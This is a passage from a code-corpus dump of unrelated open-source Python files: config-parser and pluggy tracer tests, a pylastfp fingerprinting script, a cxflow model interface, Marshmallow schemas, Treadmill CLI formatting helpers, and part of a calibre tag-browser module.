self.assertEqual(self.video.caption_languages, {'zh_HANS': 'Simplified Chinese', 'zh_HANT': 'Traditional Chinese'})
IONISx/edx-platform
common/test/acceptance/tests/video/test_studio_video_editor.py
Python
agpl-3.0
24,711
""" Tests for configuration file parsers, ... """ from ConfigParser import RawConfigParser import io import os import textwrap import pytest from ardomino.conf import (process_conf_files, find_configuration_files, create_conf_parser) @pytest.fixture def conf_dir(tmpdir): with open(str(tmpdir.join('food.ini')), 'w') as f: f.write(textwrap.dedent(""" [food:Egg] taste = Great [food:Bacon] taste = Delicious [food:Spam] taste = Sublime """)) with open(str(tmpdir.join('beverages.ini')), 'w') as f: f.write(textwrap.dedent(""" [beverage:Coffee] color = black [beverage:Milk] color = white [beverage:Tea] color = brown """)) with open(str(tmpdir.join('pets.ini')), 'w') as f: f.write(textwrap.dedent(""" [pet:Cat] says = Meow [pet:Dog] says = Bark [pet:Snake] says = """)) with open(str(tmpdir.join('not-a-conf-file.txt')), 'w') as f: f.write(textwrap.dedent(""" [this-is:not] what = a configuration file! """)) return tmpdir def test_create_conf_parser(conf_dir): conf_parser = create_conf_parser(str(conf_dir)) assert 'pet:Cat' in conf_parser.sections() assert 'food:Bacon' in conf_parser.sections() assert 'beverage:Coffee' in conf_parser.sections() assert 'this-is:not' not in conf_parser.sections() def test_find_configuration_files(conf_dir): found = find_configuration_files(str(conf_dir)) assert sorted(found) == [ str(conf_dir.join(n)) for n in 'beverages.ini', 'food.ini', 'pets.ini' ] def test_process_conf_files(): example_conf = textwrap.dedent(""" [food:Egg] description = A nice round egg [food:Spam] description = Spam Spam Spam Spam Spam! [person:JohnDoe] first_name = John last_name = Doe """) expected_result = { 'food': { 'Egg': {'description': 'A nice round egg'}, 'Spam': {'description': 'Spam Spam Spam Spam Spam!'}, }, 'person': { 'JohnDoe': { 'first_name': 'John', 'last_name': 'Doe', } } } conf_parser = RawConfigParser() conf_parser.readfp(io.BytesIO(example_conf)) result = process_conf_files(conf_parser) assert result == expected_result pass def test_process_conf_dir(conf_dir): parser = create_conf_parser(str(conf_dir)) obj = process_conf_files(parser) assert sorted(obj.keys()) == ['beverage', 'food', 'pet'] assert sorted(obj['beverage'].keys()) == ['Coffee', 'Milk', 'Tea'] assert sorted(obj['food'].keys()) == ['Bacon', 'Egg', 'Spam'] assert sorted(obj['pet'].keys()) == ['Cat', 'Dog', 'Snake'] assert obj['food']['Bacon'] == {'taste': 'Delicious'} assert obj['food']['Spam'] == {'taste': 'Sublime'}
rshk/ardomino-api
ardomino/tests/test_configuration.py
Python
bsd-3-clause
3,008
#!/usr/bin/env python """A simple program for using pylastfp to fingerprint and look up metadata for MP3 files. Usage: $ python lastmatch.py [-m] mysterious_music.mp3 By default, the script uses Gstreamer to decode audio. The -m flag makes it use MAD instead (which, of course, only works on MPEG audio such as MP3). To use the script, of course, you'll need to have either Gstreamer (and its Python bindings) or pymad installed. """ from __future__ import print_function import sys import os # Just a little trickery to avoid importing the "lastfp" package that's # in the source distribution, because it won't contain the built # _fplib.so extension module. We need to import from the built verison, # and this script is likely to be run from the distribution root. for path in '', os.path.abspath(os.path.dirname(__file__)): if path in sys.path: sys.path.remove(path) import lastfp # This API key is specifically for this script, lastmatch.py. If you # use pylastfp in your project, you'll want to generate your own. It's # easy and free! # http://last.fm/api/account API_KEY = '7821ee9bf9937b7f94af2abecced8ddd' if __name__ == '__main__': args = sys.argv[1:] if not args: print("usage: python lastmatch.py [-m] mysterious_music.mp3 [...]") sys.exit(1) if args[0] == '-m': match_func = lastfp.mad_match args.pop(0) else: match_func = lastfp.gst_match for path in args: path = os.path.abspath(os.path.expanduser(path)) # Perform match. try: xml = match_func(API_KEY, path) except lastfp.ExtractionError: print('fingerprinting failed!') sys.exit(1) except lastfp.QueryError: print('could not match fingerprint!') sys.exit(1) # Show results. matches = lastfp.parse_metadata(xml) for track in matches: print('%f: %s - %s' % (track['rank'], track['artist'], track['title']))
sampsyo/pylastfp
lastmatch.py
Python
lgpl-3.0
2,040
""" This module contains the definition of a model trainable in **cxflow** framework. """ from abc import abstractmethod, ABCMeta from typing import Iterable, Optional from ..datasets import AbstractDataset, StreamWrapper from ..types import Batch class AbstractModel(metaclass=ABCMeta): """ Abstract machine learning model which exposes input and output names, run and save methods. `AbstractModel` implementations are trainable with :py:class:`cxflow.MainLoop`. """ @abstractmethod def __init__(self, dataset: Optional[AbstractDataset], log_dir: str, restore_from: Optional[str]=None, **kwargs): """ Model constructor interface. Additional parameters (currently covered by ``**kwargs``) are passed according to the configuration ``model`` section. :param dataset: dataset object :param log_dir: existing directory in which all output files should be stored :param restore_from: information passed to the model constructor (backend-specific); usually a directory in which the trained model is stored :param kwargs: configuration section ``model`` """ pass @property @abstractmethod def input_names(self) -> Iterable[str]: """List of model input names.""" pass @property @abstractmethod def output_names(self) -> Iterable[str]: """List of model output names.""" pass @abstractmethod def run(self, batch: Batch, train: bool, stream: StreamWrapper) -> Batch: """ Run feed-forward pass with the given batch and return the results as dict. When ``train=True``, also update parameters. :param batch: batch to be processed :param train: ``True`` if this batch should be used for model update, ``False`` otherwise :param stream: stream wrapper (useful for precise buffer management) :return: results dict """ pass @abstractmethod def save(self, name_suffix: str) -> str: """ Save the model parameters with the given ``name_suffix``. :param name_suffix: name suffix to be appended to the saved model :return: path to the saved file/dir """ pass @property @abstractmethod def restore_fallback(self) -> str: """ Return the fully-qualified name of the fallback restore class (e.g. ``module.submodule.BaseClass``). When restoring a model, **cxflow** tries to use the fallback class if the construction of the model object specified in `model` configuration section fails. :return: fully-qualified name of the fallback restore class """ pass
Cognexa/cxflow
cxflow/models/abstract_model.py
Python
mit
2,738
from flask_marshmallow import Marshmallow from models import Feature, Client, Area ma = Marshmallow() class ClientSchema(ma.ModelSchema): class Meta: model = Client class AreaSchema(ma.ModelSchema): class Meta: model = Area class FeatureSchema(ma.ModelSchema): class Meta: model = Feature client_schema = ClientSchema() clients_schema = ClientSchema(many=True) area_schema = AreaSchema() areas_schema = AreaSchema(many=True) feature_schema = FeatureSchema() features_schema = FeatureSchema(many=True)
yuriyarhipov/FeatureRequestApp
schemas.py
Python
mit
546
from pluggy._tracing import TagTracer import pytest from typing import List @pytest.fixture def rootlogger() -> TagTracer: return TagTracer() def test_simple(rootlogger: TagTracer) -> None: log = rootlogger.get("pytest") log("hello") out: List[str] = [] rootlogger.setwriter(out.append) log("world") assert len(out) == 1 assert out[0] == "world [pytest]\n" sublog = log.get("collection") sublog("hello") assert out[1] == "hello [pytest:collection]\n" def test_indent(rootlogger: TagTracer) -> None: log = rootlogger.get("1") out = [] log.root.setwriter(lambda arg: out.append(arg)) log("hello") log.root.indent += 1 log("line1") log("line2") log.root.indent += 1 log("line3") log("line4") log.root.indent -= 1 log("line5") log.root.indent -= 1 log("last") assert len(out) == 7 names = [x[: x.rfind(" [")] for x in out] assert names == [ "hello", " line1", " line2", " line3", " line4", " line5", "last", ] def test_readable_output_dictargs(rootlogger: TagTracer) -> None: out = rootlogger._format_message(["test"], [1]) assert out == "1 [test]\n" out2 = rootlogger._format_message(["test"], ["test", {"a": 1}]) assert out2 == "test [test]\n a: 1\n" def test_setprocessor(rootlogger: TagTracer) -> None: log = rootlogger.get("1") log2 = log.get("2") assert log2.tags == tuple("12") out = [] rootlogger.setprocessor(tuple("12"), lambda *args: out.append(args)) log("not seen") log2("seen") assert len(out) == 1 tags, args = out[0] assert "1" in tags assert "2" in tags assert args == ("seen",) l2 = [] rootlogger.setprocessor("1:2", lambda *args: l2.append(args)) log2("seen") tags, args = l2[0] assert args == ("seen",)
pytest-dev/pluggy
testing/test_tracer.py
Python
mit
1,900
"""Treadmill commaand line helpers. """ import codecs import copy import functools import importlib import json import logging import os import pkgutil import pkg_resources import re import sys import tempfile import traceback import click import prettytable import yaml from six.moves import configparser from treadmill import context from treadmill import utils from treadmill import restclient import collections __path__ = pkgutil.extend_path(__path__, __name__) EXIT_CODE_DEFAULT = 1 IPA_PASSWORD_RE = re.compile('.{8,}') def init_logger(name): """Initialize logger.""" log_conf_file = pkg_resources.resource_stream( 'treadmill', '/logging/{name}'.format(name=name) ) try: logging.config.fileConfig( codecs.getreader('utf-8')(log_conf_file) ) except configparser.Error: with tempfile.NamedTemporaryFile(delete=False) as f: traceback.print_exc(file=f) click.echo('Error parsing log conf: {name}'.format(name=name), err=True) def make_multi_command(module_name, **click_args): """Make a Click multicommand from all submodules of the module.""" class MCommand(click.MultiCommand): """Treadmill CLI driver.""" def __init__(self, *args, **kwargs): if kwargs and click_args: kwargs.update(click_args) click.MultiCommand.__init__(self, *args, **kwargs) def list_commands(self, ctx): climod = importlib.import_module(module_name) commands = set( [modulename for _loader, modulename, _ispkg in pkgutil.iter_modules(climod.__path__)] ) return sorted([cmd.replace('_', '-') for cmd in commands]) def get_command(self, ctx, name): try: full_name = '.'.join([module_name, name.replace('-', '_')]) mod = importlib.import_module(full_name) return mod.init() except Exception: # pylint: disable=W0703 with tempfile.NamedTemporaryFile(delete=False, mode='w') as f: traceback.print_exc(file=f) click.echo( 'Unable to load plugin: %s [ %s ]' % (name, f.name), err=True) return return MCommand def _read_password(value): """Heuristic to either read the password from file or return the value.""" if os.path.exists(value): with open(value) as f: return f.read().strip() else: return value def handle_context_opt(ctx, param, value): """Handle eager CLI options to configure context. The eager options are evaluated directly during parsing phase, and can affect other options parsing (like required/not). The only side effect of consuming these options are setting attributes of the global context. """ def parse_dns_server(dns_server): """Parse dns server string""" if ':' in dns_server: hosts_port = dns_server.split(':') return (hosts_port[0].split(','), int(hosts_port[1])) else: return (dns_server.split(','), None) if not value or ctx.resilient_parsing: return None if value == '-': return None opt = param.name if opt == 'cell': context.GLOBAL.cell = value elif opt == 'dns_domain': context.GLOBAL.dns_domain = value elif opt == 'dns_server': context.GLOBAL.dns_server = parse_dns_server(value) elif opt == 'ldap': context.GLOBAL.ldap.url = value elif opt == 'ldap_suffix': context.GLOBAL.ldap.ldap_suffix = value elif opt == 'ldap_user': context.GLOBAL.ldap.user = value elif opt == 'ldap_pwd': context.GLOBAL.ldap.password = _read_password(value) elif opt == 'zookeeper': context.GLOBAL.zk.url = value else: raise click.UsageError('Invalid option: %s' % param.name) return value class _CommaSepList(click.ParamType): """Custom input type for comma separated values.""" name = 'list' def convert(self, value, param, ctx): """Convert command line argument to list.""" if value is None: return [] try: return value.split(',') except AttributeError: self.fail('%s is not a comma separated list' % value, param, ctx) LIST = _CommaSepList() class _KeyValuePairs(click.ParamType): """Custom input type for key/value pairs.""" name = 'key/value pairs' def convert(self, value, param, ctx): """Convert command line argument to list.""" if value is None: return {} items = re.split(r'(\w+=)', value) items.pop(0) keys = [key.rstrip('=') for key in items[0::2]] values = [value.rstrip(',') for value in items[1::2]] return dict(zip(keys, values)) DICT = _KeyValuePairs() def validate_memory(_ctx, _param, value): """Validate memory string.""" if value is None: return if not re.search(r'\d+[KkMmGg]$', value): raise click.BadParameter('Memory format: nnn[K|M|G].') return value def validate_disk(_ctx, _param, value): """Validate disk string.""" if value is None: return if not re.search(r'\d+[KkMmGg]$', value): raise click.BadParameter('Disk format: nnn[K|M|Gyy].') return value def validate_cpu(_ctx, _param, value): """Validate cpu string.""" if value is None: return if not re.search(r'\d+%$', value): raise click.BadParameter('CPU format: nnn%.') return value def wrap_words(words, length, sep=',', newline='\n'): """Join words by sep, no more than count in each line.""" lines = [] line = [] cur_length = 0 while True: if not words: lines.append(line) break if cur_length + len(line) > length: lines.append(line) cur_length = 0 line = [] word = words.pop(0) cur_length += len(word) line.append(word) return newline.join([sep.join(line) for line in lines]) def make_wrap_words(length, sep=','): """Returng wrap words function.""" return lambda words: wrap_words(words, length, sep) def _make_table(columns, header=False): """Make a table object for output.""" table = prettytable.PrettyTable(columns) for col in columns: table.align[col] = 'l' table.set_style(prettytable.PLAIN_COLUMNS) # For some reason, headers must be disable after set_style. table.header = header table.left_padding_width = 0 table.right_padding_width = 2 return table def _cell(item, column, key, fmt): """Constructs a value in table cell.""" if key is None: key = column if isinstance(key, str): keys = [key] else: keys = key raw_value = None while keys: key = keys.pop(0) if key in item: raw_value = item[key] break if isinstance(fmt, collections.Callable): try: value = fmt(raw_value) except Exception: # pylint: disable=W0703 if raw_value is None: value = '-' else: raise else: if raw_value is None: value = '-' else: if isinstance(raw_value, list): value = ','.join(map(str, raw_value)) else: value = raw_value return value def dict_to_table(item, schema): """Display object as table.""" table = _make_table(['key', '', 'value'], header=False) for column, key, fmt in schema: value = _cell(item, column, key, fmt) table.add_row([column, ':', value]) return table def make_dict_to_table(schema): """Return dict to table function given schema.""" return lambda item: dict_to_table(item, schema) def list_to_table(items, schema, header=True): """Display list of items as table.""" columns = [column for column, _, _ in schema] table = _make_table(columns, header=header) if items is None: items = [] for item in items: row = [] for column, key, fmt in schema: row.append(_cell(item, column, key, fmt)) table.add_row(row) return table def make_list_to_table(schema, header=True): """Return list to table function given schema.""" return lambda items: list_to_table(items, schema, header) def combine(list_of_values, sep=','): """Split and sum list of sep string into one list.""" combined = sum( [str(values).split(sep) for values in list(list_of_values)], [] ) if combined == ['-']: combined = None return combined def out(string, *args): """Print to stdout.""" if args: string = string % args click.echo(string) def handle_exceptions(exclist): """Decorator that will handle exceptions and output friendly messages.""" def wrap(f): """Returns decorator that wraps/handles exceptions.""" exclist_copy = copy.copy(exclist) @functools.wraps(f) def wrapped_f(*args, **kwargs): """Wrapped function.""" if not exclist_copy: f(*args, **kwargs) else: exc, handler = exclist_copy.pop(0) try: wrapped_f(*args, **kwargs) except exc as err: if isinstance(handler, str): click.echo(handler, err=True) elif handler is None: click.echo(str(err), err=True) else: click.echo(handler(err), err=True) sys.exit(EXIT_CODE_DEFAULT) @functools.wraps(f) def _handle_any(*args, **kwargs): """Default exception handler.""" try: return wrapped_f(*args, **kwargs) except Exception as unhandled: # pylint: disable=W0703 with tempfile.NamedTemporaryFile(delete=False, mode='w') as f: traceback.print_exc(file=f) click.echo('Error: %s [ %s ]' % (unhandled, f.name), err=True) sys.exit(EXIT_CODE_DEFAULT) return _handle_any return wrap OUTPUT_FORMAT = 'pretty' def make_formatter(pretty_formatter): """Makes a formatter.""" def _format(item, how=None): """Formats the object given global format setting.""" if how is None: how = OUTPUT_FORMAT formatters = { 'json': json.dumps, 'yaml': utils.dump_yaml, } if pretty_formatter is not None: try: formatters['pretty'] = pretty_formatter.format except AttributeError: formatters['pretty'] = pretty_formatter if how in formatters: return formatters[how](item) else: return str(item) return _format class AppPrettyFormatter(object): """Pretty table app formatter.""" @staticmethod def format(item): """Return pretty-formatted item.""" services_restart_tbl = make_dict_to_table([ ('limit', None, None), ('interval', None, None), ]) services_tbl = make_list_to_table([ ('name', None, None), ('root', None, None), ('restart', None, services_restart_tbl), ( 'command', None, lambda cmd: wrap_words(cmd.split(), 40, ' ', '\n ') ), ]) endpoints_tbl = make_list_to_table([ ('name', None, None), ('port', None, None), ('proto', None, lambda proto: proto if proto else 'tcp'), ('type', None, None), ]) environ_tbl = make_list_to_table([ ('name', None, None), ('value', None, None), ]) vring_rules_tbl = make_list_to_table([ ('pattern', None, None), ('endpoints', None, ','.join), ]) vring_tbl = make_dict_to_table([ ('cells', None, ','.join), ('rules', None, vring_rules_tbl), ]) ephemeral_tbl = make_dict_to_table([ ('tcp', None, None), ('udp', None, None), ]) schema = [ ('name', '_id', None), ('memory', None, None), ('cpu', None, None), ('disk', None, None), ('tickets', None, None), ('features', None, None), ('identity-group', 'identity_group', None), ('schedule-once', 'schedule_once', None), ('shared-ip', 'shared_ip', None), ('ephemeral-ports', 'ephemeral_ports', ephemeral_tbl), ('services', None, services_tbl), ('endpoints', None, endpoints_tbl), ('environ', None, environ_tbl), ('vring', None, vring_tbl), ('passthrough', None, '\n'.join), ('data-retention-timeout', 'data_retention_timeout', None), ] format_item = make_dict_to_table(schema) format_list = make_list_to_table([ ('name', '_id', None), ('memory', None, None), ('cpu', None, None), ('disk', None, None), ('tickets', None, None), ('features', None, None), ]) if isinstance(item, list): return format_list(item) else: return format_item(item) class AppMonitorPrettyFormatter(object): """Pretty table app monitor formatter.""" @staticmethod def format(item): """Return pretty-formatted item.""" schema = [('monitor', '_id', None), ('count', 'count', None)] format_item = make_dict_to_table(schema) format_list = make_list_to_table(schema) if isinstance(item, list): return format_list(item) else: return format_item(item) class IdentityGroupPrettyFormatter(object): """Pretty table identity group formatter.""" @staticmethod def format(item): """Return pretty-formatted item.""" schema = [('identity-group', '_id', None), ('count', 'count', None)] format_item = make_dict_to_table(schema) format_list = make_list_to_table(schema) if isinstance(item, list): return format_list(item) else: return format_item(item) class ServerPrettyFormatter(object): """Pretty table server formatter.""" @staticmethod def format(item): """Return pretty-formatted item.""" schema = [ ('name', '_id', None), ('cell', None, None), ('traits', None, None), ('partition', None, None), ('data', None, None), ] format_item = make_dict_to_table(schema) format_list = make_list_to_table(schema) if isinstance(item, list): return format_list(item) else: return format_item(item) class ServerNodePrettyFormatter(object): """Pretty table server (scheduler) node formatter.""" @staticmethod def format(item): """Return pretty-formatted item.""" schema = [('name', None, None), ('memory', None, None), ('cpu', None, None), ('disk', None, None), ('partition', None, None), ('parent', None, None), ('traits', None, None)] format_item = make_dict_to_table(schema) format_list = make_list_to_table(schema) if isinstance(item, list): return format_list(item) else: return format_item(item) class LdapSchemaPrettyFormatter(object): """Pretty table ldap schema formatter.""" @staticmethod def format(item): """Return pretty-formatted item.""" attr_tbl = make_list_to_table([ ('name', None, None), ('desc', None, None), ('type', None, None), ('ignore_case', None, None), ]) objcls_tbl = make_list_to_table([ ('name', None, None), ('desc', None, None), ('must', None, None), ('may', None, make_wrap_words(40)), ]) schema_tbl = make_dict_to_table([ ('dn', None, None), ('attributes', 'attributeTypes', attr_tbl), ('objects', 'objectClasses', objcls_tbl), ]) return schema_tbl(item) class BucketPrettyFormatter(object): """Pretty table bucket formatter.""" @staticmethod def format(item): """Return pretty-formatted item.""" schema = [('name', None, None), ('parent', None, None), ('traits', None, None)] format_item = make_dict_to_table(schema) format_list = make_list_to_table(schema) if isinstance(item, list): return format_list(item) else: return format_item(item) class CellPrettyFormatter(object): """Pretty table cell formatter.""" @staticmethod def format(item): """Return pretty-formatted item.""" masters_tbl = make_list_to_table([ ('idx', None, None), ('hostname', None, None), ('zk-client-port', None, None), ('zk-jmx-port', None, None), ('zk-followers-port', None, None), ('zk-election-port', None, None), ]) partitions_tbl = make_list_to_table([ ('id', 'partition', None), ('cpu', None, None), ('disk', None, None), ('memory', None, None), ('down threshold', 'down-threshold', None), ]) schema = [ ('name', '_id', None), ('version', None, None), ('root', None, None), ('username', None, None), ('location', None, None), ('archive-server', None, None), ('archive-username', None, None), ('ssq-namespace', None, None), ('masters', None, masters_tbl), ('partitions', None, partitions_tbl), ('data', None, yaml.dump), ] format_item = make_dict_to_table(schema) format_list = make_list_to_table([ ('name', '_id', None), ('location', None, None), ('version', None, None), ('username', None, None), ('root', None, None), ]) if isinstance(item, list): return format_list(item) else: return format_item(item) class DNSPrettyFormatter(object): """Pretty table critical DNS formatter.""" @staticmethod def format(item): """Return pretty-formatted item.""" schema = [('name', '_id', None), ('location', None, None), ('servers', 'server', '\n'.join), ('rest-servers', 'rest-server', '\n'.join), ('zkurl', None, None), ('fqdn', None, None), ('ttl', None, None), ('nameservers', None, '\n'.join)] format_item = make_dict_to_table(schema) format_list = make_list_to_table([ ('name', '_id', None), ('location', None, None), ('fqdn', None, None), ('servers', 'server', ','.join), ]) if isinstance(item, list): return format_list(item) return format_item(item) class AppGroupPrettyFormatter(object): """Pretty table App Groups formatter.""" @staticmethod def format(item): """Return pretty-formatted item.""" schema = [('name', '_id', None), ('type', 'group-type', None), ('cells', None, None), ('pattern', None, None), ('endpoints', None, None), ('data', None, None)] format_item = make_dict_to_table(schema) format_list = make_list_to_table(schema) if isinstance(item, list): return format_list(item) else: return format_item(item) class TenantPrettyFormatter(object): """Pretty table tenant formatter.""" @staticmethod def format(item): """Return pretty-formatted item.""" schema = [ ('tenant', ['_id', 'tenant'], None), ('system', 'systems', None), ('allocations', 'allocations', AllocationPrettyFormatter.format), ] format_item = make_dict_to_table(schema) format_list = make_list_to_table(schema) if isinstance(item, list): return format_list(item) else: return format_item(item) class AllocationPrettyFormatter(object): """Pretty table allocation formatter.""" @staticmethod def format(item): """Return pretty-formatted item.""" assignments_table = make_list_to_table([ ('pattern', None, None), ('priority', None, None), ]) cell_tbl = make_list_to_table([ ('cell', 'cell', None), ('partition', None, None), ('rank', None, None), ('max-utilization', None, None), ('memory', None, None), ('cpu', None, None), ('disk', None, None), ('traits', None, '\n'.join), ('assignments', None, assignments_table), ]) schema = [ ('name', '_id', None), ('environment', None, None), ('reservations', None, cell_tbl), ] format_item = make_dict_to_table(schema) format_list = make_list_to_table(schema) if isinstance(item, list): return format_list(item) else: return format_item(item) class InstanceStatePrettyFormatter(object): """Pretty table instance state formatter.""" @staticmethod def format(item): """Return pretty-formatted item.""" schema = [ ('name', None, None), ('state', None, None), ('host', None, None), ] format_item = make_dict_to_table(schema) format_list = make_list_to_table(schema, header=False) if isinstance(item, list): return format_list(item) else: return format_item(item) class EndpointPrettyFormatter(object): """Pretty table endpoint formatter.""" @staticmethod def format(item): """Return pretty-formatted item.""" schema = [ ('name', None, None), ('proto', None, None), ('endpoint', None, None), ('hostport', None, None), ] format_item = make_dict_to_table(schema) format_list = make_list_to_table(schema, header=False) if isinstance(item, list): return format_list(item) else: return format_item(item) class PartitionPrettyFormatter(object): """Pretty table partition formatter.""" @staticmethod def format(item): """Return pretty-formatted item.""" schema = [ ('id', 'partition', None), ('cell', None, None), ('cpu', None, None), ('disk', None, None), ('memory', None, None), ('down threshold', 'down-threshold', None), ] format_item = make_dict_to_table(schema) format_list = make_list_to_table(schema) if isinstance(item, list): return format_list(item) else: return format_item(item) class CronPrettyFormatter(object): """Pretty table formatter for cron jobs.""" @staticmethod def format(item): """Return pretty-formatted item.""" schema = [ ('id', '_id', None), ('resource', None, None), ('event', None, None), ('action', None, None), ('count', None, None), ('expression', None, None), ('next_run_time', None, None), ('timezone', None, None), ] format_item = make_dict_to_table(schema) format_list = make_list_to_table(schema) if isinstance(item, list): return format_list(item) else: return format_item(item) def bad_exit(string, *args): """System exit non-zero with a string to sys.stderr. The printing takes care of the newline""" if args: string = string % args click.echo(string, err=True) sys.exit(-1) def echo_colour(colour, string, *args): """click.echo colour with support for placeholders, e.g. %s""" if args: string = string % args click.echo(click.style(string, fg=colour)) def echo_green(string, *args): """click.echo green with support for placeholders, e.g. %s""" echo_colour('green', string, *args) def echo_yellow(string, *args): """click.echo yellow with support for placeholders, e.g. %s""" echo_colour('yellow', string, *args) def echo_red(string, *args): """click.echo yellow with support for placeholders, e.g. %s""" echo_colour('red', string, *args) def handle_not_authorized(err): """Handle REST NotAuthorizedExceptions""" msg = str(err) msgs = [re.sub(r'failure: ', ' ', line) for line in msg.split(r'\n')] echo_red('Not authorized.') click.echo('\n'.join(msgs), nl=False) REST_EXCEPTIONS = [ (restclient.NotFoundError, 'Resource not found'), (restclient.AlreadyExistsError, 'Resource already exists'), (restclient.ValidationError, None), (restclient.NotAuthorizedError, handle_not_authorized), (restclient.BadRequestError, None), (restclient.MaxRequestRetriesError, None) ] ON_REST_EXCEPTIONS = handle_exceptions(REST_EXCEPTIONS)
ThoughtWorksInc/treadmill
treadmill/cli/__init__.py
Python
apache-2.0
26,172
#!/usr/bin/env python # vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai from __future__ import (unicode_literals, division, absolute_import, print_function) __license__ = 'GPL v3' __copyright__ = '2011, Kovid Goyal <kovid@kovidgoyal.net>' __docformat__ = 'restructuredtext en' from functools import partial from PyQt4.Qt import (Qt, QIcon, QWidget, QHBoxLayout, QVBoxLayout, QShortcut, QKeySequence, QToolButton, QString, QLabel, QFrame, QTimer, QMenu, QPushButton, QActionGroup) from calibre.gui2 import error_dialog, question_dialog from calibre.gui2.widgets import HistoryLineEdit from calibre.library.field_metadata import category_icon_map from calibre.utils.icu import sort_key from calibre.gui2.tag_browser.view import TagsView from calibre.ebooks.metadata import title_sort from calibre.gui2.dialogs.tag_categories import TagCategories from calibre.gui2.dialogs.tag_list_editor import TagListEditor from calibre.gui2.dialogs.edit_authors_dialog import EditAuthorsDialog class TagBrowserMixin(object): # {{{ def __init__(self, db): self.library_view.model().count_changed_signal.connect(self.tags_view.recount) self.tags_view.set_database(db, self.alter_tb) self.tags_view.tags_marked.connect(self.search.set_search_string) self.tags_view.tags_list_edit.connect(self.do_tags_list_edit) self.tags_view.edit_user_category.connect(self.do_edit_user_categories) self.tags_view.delete_user_category.connect(self.do_delete_user_category) self.tags_view.del_item_from_user_cat.connect(self.do_del_item_from_user_cat) self.tags_view.add_subcategory.connect(self.do_add_subcategory) self.tags_view.add_item_to_user_cat.connect(self.do_add_item_to_user_cat) self.tags_view.saved_search_edit.connect(self.do_saved_search_edit) self.tags_view.rebuild_saved_searches.connect(self.do_rebuild_saved_searches) self.tags_view.author_sort_edit.connect(self.do_author_sort_edit) self.tags_view.tag_item_renamed.connect(self.do_tag_item_renamed) self.tags_view.search_item_renamed.connect(self.saved_searches_changed) self.tags_view.drag_drop_finished.connect(self.drag_drop_finished) self.tags_view.restriction_error.connect(self.do_restriction_error, type=Qt.QueuedConnection) self.tags_view.tag_item_delete.connect(self.do_tag_item_delete) for text, func, args, cat_name in ( (_('Manage Authors'), self.do_author_sort_edit, (self, None), 'authors'), (_('Manage Series'), self.do_tags_list_edit, (None, 'series'), 'series'), (_('Manage Publishers'), self.do_tags_list_edit, (None, 'publisher'), 'publisher'), (_('Manage Tags'), self.do_tags_list_edit, (None, 'tags'), 'tags'), (_('Manage User Categories'), self.do_edit_user_categories, (None,), 'user:'), (_('Manage Saved Searches'), self.do_saved_search_edit, (None,), 'search') ): m = self.alter_tb.manage_menu m.addAction(QIcon(I(category_icon_map[cat_name])), text, partial(func, *args)) def do_restriction_error(self): error_dialog(self.tags_view, _('Invalid search restriction'), _('The current search restriction is invalid'), show=True) def do_add_subcategory(self, on_category_key, new_category_name=None): ''' Add a subcategory to the category 'on_category'. If new_category_name is None, then a default name is shown and the user is offered the opportunity to edit the name. ''' db = self.library_view.model().db user_cats = db.prefs.get('user_categories', {}) # Ensure that the temporary name we will use is not already there i = 0 if new_category_name is not None: new_name = new_category_name.replace('.', '') else: new_name = _('New Category').replace('.', '') n = new_name while True: new_cat = on_category_key[1:] + '.' + n if new_cat not in user_cats: break i += 1 n = new_name + unicode(i) # Add the new category user_cats[new_cat] = [] db.prefs.set('user_categories', user_cats) self.tags_view.recount() m = self.tags_view.model() idx = m.index_for_path(m.find_category_node('@' + new_cat)) self.tags_view.show_item_at_index(idx) # Open the editor on the new item to rename it if new_category_name is None: self.tags_view.edit(idx) def do_edit_user_categories(self, on_category=None): ''' Open the user categories editor. ''' db = self.library_view.model().db d = TagCategories(self, db, on_category) if d.exec_() == d.Accepted: db.prefs.set('user_categories', d.categories) db.field_metadata.remove_user_categories() for k in d.categories: db.field_metadata.add_user_category('@' + k, k) db.data.change_search_locations(db.field_metadata.get_search_terms()) self.tags_view.recount() def do_delete_user_category(self, category_name): ''' Delete the user category named category_name. Any leading '@' is removed ''' if category_name.startswith('@'): category_name = category_name[1:] db = self.library_view.model().db user_cats = db.prefs.get('user_categories', {}) cat_keys = sorted(user_cats.keys(), key=sort_key) has_children = False found = False for k in cat_keys: if k == category_name: found = True has_children = len(user_cats[k]) elif k.startswith(category_name + '.'): has_children = True if not found: return error_dialog(self.tags_view, _('Delete user category'), _('%s is not a user category')%category_name, show=True) if has_children: if not question_dialog(self.tags_view, _('Delete user category'), _('%s contains items. Do you really ' 'want to delete it?')%category_name): return for k in cat_keys: if k == category_name: del user_cats[k] elif k.startswith(category_name + '.'): del user_cats[k] db.prefs.set('user_categories', user_cats) self.tags_view.recount() def do_del_item_from_user_cat(self, user_cat, item_name, item_category): ''' Delete the item (item_name, item_category) from the user category with key user_cat. Any leading '@' characters are removed ''' if user_cat.startswith('@'): user_cat = user_cat[1:] db = self.library_view.model().db user_cats = db.prefs.get('user_categories', {}) if user_cat not in user_cats: error_dialog(self.tags_view, _('Remove category'), _('User category %s does not exist')%user_cat, show=True) return self.tags_view.model().delete_item_from_user_category(user_cat, item_name, item_category) self.tags_view.recount() def do_add_item_to_user_cat(self, dest_category, src_name, src_category): ''' Add the item src_name in src_category to the user category dest_category. Any leading '@' is removed ''' db = self.library_view.model().db user_cats = db.prefs.get('user_categories', {}) if dest_category and dest_category.startswith('@'): dest_category = dest_category[1:] if dest_category not in user_cats: return error_dialog(self.tags_view, _('Add to user category'), _('A user category %s does not exist')%dest_category, show=True) # Now add the item to the destination user category add_it = True if src_category == 'news': src_category = 'tags' for tup in user_cats[dest_category]: if src_name == tup[0] and src_category == tup[1]: add_it = False if add_it: user_cats[dest_category].append([src_name, src_category, 0]) db.prefs.set('user_categories', user_cats) self.tags_view.recount() def do_tags_list_edit(self, tag, category): ''' Open the 'manage_X' dialog where X == category. If tag is not None, the dialog will position the editor on that item. ''' tags_model = self.tags_view.model() result = tags_model.get_category_editor_data(category) if result is None: return if category == 'series': key = lambda x:sort_key(title_sort(x)) else: key = sort_key db=self.library_view.model().db d = TagListEditor(self, cat_name=db.field_metadata[category]['name'], tag_to_match=tag, data=result, sorter=key) d.exec_() if d.result() == d.Accepted: to_rename = d.to_rename # dict of old id to new name to_delete = d.to_delete # list of ids orig_name = d.original_names # dict of id: name rename_func = None if category == 'tags': rename_func = db.rename_tag delete_func = db.delete_tag_using_id elif category == 'series': rename_func = db.rename_series delete_func = db.delete_series_using_id elif category == 'publisher': rename_func = db.rename_publisher delete_func = db.delete_publisher_using_id else: # must be custom cc_label = db.field_metadata[category]['label'] rename_func = 